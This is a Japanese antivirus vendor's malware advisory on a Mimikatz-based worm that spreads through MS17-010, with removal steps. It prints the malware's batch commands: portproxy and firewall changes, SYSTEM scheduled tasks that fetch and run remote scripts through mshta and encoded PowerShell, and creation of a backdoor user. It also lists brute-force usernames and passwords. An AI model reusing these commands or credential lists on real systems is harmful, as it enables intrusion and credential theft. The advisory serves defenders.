Trend Micro Security

Trojan.Win32.MIMIKATZ.ADT

2019年2月8日
 解析者: John Anthony Banes   
 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化: なし
  • 感染報告の有無: はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、特定の脆弱性を利用した感染活動を実行します。

  詳細

ファイルサイズ 8,288,353 bytes
タイプ EXE
メモリ常駐 はい
発見日 2019年1月26日
ペイロード URLまたはIPアドレスに接続, プロキシサーバとして機能

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • %Temp%\mkatz.ini - Mimikatz script output

(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。.)

マルウェアは、以下のファイルを作成し実行します。

  • %Temp%\m.ps1 - obfuscated Mimikatz PowerShell script

(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。.)

その他

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

<補足>
インストール

マルウェアは、以下のファイルを作成します。

  • %Temp%\mkatz.ini - Mimikatz スクリプトの出力

(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。)

マルウェアは、以下のファイルを作成し実行します。

  • %Temp%\m.ps1 - 難読化されたMimikatz のパワーシェルスクリプト

(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。)

その他

マルウェアは、以下を実行します。

  • マルウェアは、以下のWebサイトに接続して、スクリプトをダウンロードして実行します。
    • http://v.{BLOCKED}h.com/v{ユーザドメイン}
    • http://w.{BLOCKED}h.com/page.html?p{コンピュータ名}
  • ポート60124は、Mutexとして機能し、1つのインスタンスのみ実行します。
  • マルウェアは、ユーザ"k8h3d"が存在する場合、削除します。その後、マルウェアは、感染コンピュータまたは脆弱なコンピュータ上に同じユーザ名を作成します。
  • マルウェアは、ローカルネットワークをスキャンして、開いているポート445を検索します。
    マルウェアは、ポート445が開いているターゲットを見つけた場合、MS17-010の脆弱性を悪用し、以下のコマンドを実行します。
    • 以下のいずれかのファイルをターゲットに送信し、%System Root%\ installed.exeとして保存
      • %Windows%\System32\svhost.exe
      • %Windows%\SysWOW64\svhost.exe
      • %Windows%\System32\drivers\svchost.exe
      • %Windows%\SysWOW64\drivers\svchost.exe
    • ファイル%Temp%\ svchost.exeまたは%Temp%\ svvhost.exeをターゲットに送信し、%Temp%\ svchost.exeとして保存
    • 以下のffコマンドを含む%Temp%\ p.batという名前のバッチファイルを作成
      • netsh interface ipv6 install
      • netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53
      • netsh firewall add portopening tcp 65531 DNSS2
      • netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
      • if exist %System%/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base-64 string}" /F) else start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p{Computer Name}"&schtasks /run /TN Autocheck)
      • net start Ddriver
      • for /f %i in (\'tasklist ^| find /c /i "cmd.exe"\') do set s=%i
      • if gtr 10 (shutdown /r)
      • net user k8h3d /del
      • del %Temp%\p.bat
    • 送信したファイルをターゲットのコンピュータで実行

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

マルウェアは、以下のスケジュールタスクを追加します。

  • タスク名: DnsScan
    実行するタスク: %Temp%\svchost.exe
  • タスク名: \Microsoft\windows\Bluetooths
    実行するタスク: powershell -ep bypass -e {base-64 文字列}
  • タスク名: Autocheck
    実行するタスク: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
  • タスク名: Autoscan
    実行するタスク: %Temp%\svchost.exe

    • 注意:

    • http://v.{BLOCKED}h.com/v{ユーザドメイン}
    • http://w.{BLOCKED}h.com/page.html?p{コンピュータ名}

      • ただし、情報公開日現在、上記のWebサイトにはアクセスできません。

      マルウェアは、ターゲットのコンピュータへのログインを試みるため、以下のユーザ名とパスワードを使用します。

      • ユーザ名:
      • Administrator
      • user
      • admin
      • test
      • k8h3d

      • パスワード:
      • 123456
      • password
      • qwerty
      • 12345678
      • 123456789
      • 123
      • 1234
      • 123123
      • 12345
      • 12345678
      • 123123123
      • 1234567890
      • 88888888
      • 111111111
      • 0
      • 111111
      • 112233
      • 123321
      • 654321
      • 666666
      • 888888
      • a123456
      • 123456a
      • 5201314
      • 1qaz2wsx
      • 1q2w3e4r
      • qwe123
      • 123qwe
      • a123456789
      • 123456789a
      • baseball
      • dragon
      • football
      • iloveyou
      • password
      • sunshine
      • princess
      • welcome
      • abc123
      • monkey
      • !@#$%^&*
      • charlie
      • aa123456
      • k8d3j9SjfS7

      ファイル%Temp%\ mkatz.iniは、ドメイン、ユーザ名またはパスワードを取得するために解析されます。これらは、感染コンピュータへのログインの試行にも使用されます。

        対応方法

      対応検索エンジン: 9.850
      初回 VSAPI パターンバージョン 14.786.05
      初回 VSAPI パターンリリース日 2019年2月1日
      VSAPI OPR パターンバージョン 14.787.00
      VSAPI OPR パターンリリース日 2019年2月2日

      手順 1

      Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

      手順 2

      このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

      手順 3

      「Trojan.Win32.MIMIKATZ.ADT」で検出したファイル名を確認し、そのファイルを終了します。

      [ 詳細 ]

      • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
      • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
        セーフモードについては、こちらをご参照下さい。
      • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

      手順 4

      スケジュールされたタスクを削除する

      タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

      • Task Name: DnsScan
      • Task to be Run: %Temp%\svchost.exe
      • Task Name: \Microsoft\windows\Bluetooths
      • Task to be Run: powershell -ep bypass -e {base-64 string}
      • Task Name: Autocheck
      • Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
      • Task Name: Autoscan
      • Task to be Run: %Temp%\svchost.exe

      Windows 2000、Windows XP、Windows Server 2003の場合:

      1. [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
      2. 上記の{タスク名} を、[名前]の欄に入力します。
      3. 入力した{タスク名} 持つファイルを右クリックします。
      4. [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
      5. 上記の{実行するタスク}と文字列が一致するタスクを削除します。

      Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:

      1. Windowsタスクスケジューラを開きます。
        • Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
        • Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
      2. 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
      3. 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
      4. 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
      5. 文字列が一致するタスクを削除します。

      手順 5

      以下のファイルを検索し削除します。

      [ 詳細 ]
      コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
      • %Temp%\mkatz.ini
      • %Temp%\m.ps1
      • %Windows%\System32\svhost.exe
      • %Windows%\SysWOW64\svhost.exe
      • %Windows%\System32\drivers\svchost.exe
      • %Windows%\SysWOW64\drivers\svchost.exe
      • %Temp%\svchost.exe
      • %Temp%\svvhost.exe

      手順 6

      最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Win32.MIMIKATZ.ADT」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

      手順 7

      以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。  Microsoft Security Bulletin MS17-010


      ご利用はいかがでしたか? アンケートにご協力ください